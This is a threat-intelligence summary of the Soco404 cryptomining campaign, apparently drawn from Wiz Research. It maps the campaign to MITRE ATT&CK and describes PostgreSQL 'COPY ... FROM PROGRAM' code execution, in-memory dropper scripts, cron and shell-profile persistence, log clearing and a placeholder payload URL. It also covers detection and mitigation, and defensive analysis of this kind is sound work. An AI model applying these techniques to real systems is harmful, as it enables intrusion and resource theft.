Full Report
Wiz Research has identified a new iteration of a broader malicious cryptomining campaign, which we’ve dubbed Soco404.
Analysis Summary
# Tool/Technique: Soco404 (Cryptomining Campaign Infrastructure)
## Overview
Soco404 is the designation given by Wiz Research to a new iteration of a broad, opportunistic, and versatile cryptomining campaign. This campaign targets cloud environments, exploiting misconfigurations (notably in PostgreSQL) and vulnerable public-facing applications (like Apache Tomcat, Struts, and Confluence) to deploy platform-specific malware for resource hijacking (cryptomining). The infrastructure supporting this campaign is diverse, utilizing compromised legitimate servers, fake 404 error pages, and dedicated crypto-scam websites.
## Technical Details
- Type: Malware Campaign / Infrastructure
- Platform: Linux and Windows
- Capabilities: Exploitation of PostgreSQL, cross-platform payload delivery, persistence mechanisms tailored for both OSs, crypto-mining, hosting payloads on compromised infrastructure and custom deceptive domains.
- First Seen: Not explicitly stated, but noted as a "new iteration" building upon previously documented activity (Aqua/Imperva findings).
## MITRE ATT&CK Mapping
- **Initial Access**
- **T1190 - Exploit Public-Facing Application**
- **Execution**
- **T1059.004 - Command and Scripting Interpreter: Unix Shell**
- **T1559 - Inter-Process Communication**
- **Persistence**
- **T1053.003 - Create or Modify System Process: Cron**
- **T1543.003 - Create or Modify System Process: Windows Service**
- **T1546.004 - Event Triggered Execution: Unix Shell Configuration Modification** (via `.bashrc`, `.profile`)
- **Defense Evasion**
- **T1036.005 - Masquerading: Match Legitimate Name or Location**
- **T1070.002 - Indicator Removal: Clear Linux or Mac System Logs**
- **T1070.004 - Indicator Removal: File Deletion**
- **T1562.002 - Impair Defenses: Disable Windows Event Logging**
- **T1027.006 - Obfuscated Files or Information: HTML Smuggling**
- **T1055 - Process Injection**
- **Credential Access**
- **T1110.003 - Brute Force: Password Spraying** (Used in broader context against Tomcat/Struts/Confluence)
- **Command and Control**
- **T1105 - Ingress Tool Transfer**
- **Impact**
- **T1496 - Resource Hijacking** (Cryptomining)
- **Resource Development**
- **T1583.006 - Acquire Infrastructure: Web Services** (Using Google Sites for payload hosting initially)
- **T1584.004 - Compromise Infrastructure: Server** (Abusing legitimate servers)
## Functionality
### Core Capabilities
- **Initial Compromise:** Exploiting misconfigured PostgreSQL instances using `COPY ... FROM PROGRAM` for Remote Code Execution (RCE). Also targeting exposed Apache Tomcat, Apache Struts, and Atlassian Confluence servers.
- **Payload Delivery:** Leverages diverse methods including abusing legitimate servers (compromised Tomcat instances), custom domains displaying fake 404 pages (potentially using HTML Smuggling), and disposable infrastructure like Google Sites.
- **Execution:** For Linux, the `soco.sh` dropper script runs directly in memory, downloads the main payload, executes it, and then deletes the dropper script.
- **Platform Versatility:** Deploys platform-specific malware for both Linux and Windows targets.
### Advanced Features
- **Process Masquerading:** Disguises malicious activity to appear as legitimate system processes (`T1036.005`).
- **In-Memory Execution:** The Linux dropper script runs directly in memory to avoid immediate disk-based detection.
- **Inter-Process Communication:** The malware spawns multiple child processes that communicate using local sockets.
- **Infrastructure Abuse:** Uses compromised legitimate infrastructure (e.g., a Korean transportation website) to host and deliver payloads, increasing trust and evading security controls.
- **Evasion:** Explicitly avoids dropping files into known volatile directories like `/tmp` or `/sys` on Linux targets.
## Indicators of Compromise
*Note: Specific IoCs (hashes, IPs, domains) were not extracted comprehensively, but general descriptions are provided.*
- File Hashes: N/A (Specific hashes were not isolated in the TL;DR structure provided)
- File Names: Payload file name referenced as `app2` when downloaded from the distribution server. Payload name inferred as related to **Soco404**.
- Registry Keys: N/A (Windows persistence details are sparse)
- Network Indicators:
- Distribution point example: `http://<IP>:8080/app2`
- Connection via compromised infrastructure hosts.
- Evidence of communication related to a crypto wallet address (Mining Pool Communication).
- Behavioral Indicators:
- Abuse of PostgreSQL’s `COPY ... FROM PROGRAM`.
- Use of standard ingress tools like `wget`, `curl` (Linux) or `certutil`, `PowerShell` (Windows).
- Creation of cron jobs (`T1053.003`) and modification of shell initialization files (`.bashrc`, `.profile`) for persistence (`T1546.004`).
## Associated Threat Actors
- The threat actor behind **Soco404** (Part of a broader, versatile, opportunistic crypto-scam infrastructure). Associated with previous activity documented targeting Apache Tomcat, Struts, and Confluence.
## Detection Methods
- **Signature-based detection:** Detection on specific payload hashes (if available).
- **Behavioral detection:** Monitoring for PostgreSQL activity utilizing `COPY ... FROM PROGRAM`. Monitoring for the creation of persistence mechanisms like new cron entries or shell initialization modifications. Detecting process masquerading attempts by monitoring child processes spawned by legitimate system parents.
- **YARA rules if available:** N/A (Not provided in context)
## Mitigation Strategies
- **Prevention measures:** Patching vulnerabilities in public-facing applications (Tomcat, Struts, Confluence). Secure configuration of PostgreSQL instances, ensuring no unauthenticated access.
- **Hardening recommendations:** Restrict public internet access to database services like PostgreSQL. Implement strong authentication on all public-facing services. Monitor and restrict the use of unusual command execution functions like `COPY ... FROM PROGRAM` if possible. Disable unnecessary services.
## Related Tools/Techniques
- Similar cryptomining botnets/campaigns previously documented targeting Tomcat, Struts, and Confluence (implied connection to Sysrv botnet activity mentioned in context).
- Use of standard Linux utilities (`wget`, `curl`) and Windows utilities (`certutil`, `PowerShell`) for initial execution and transfer.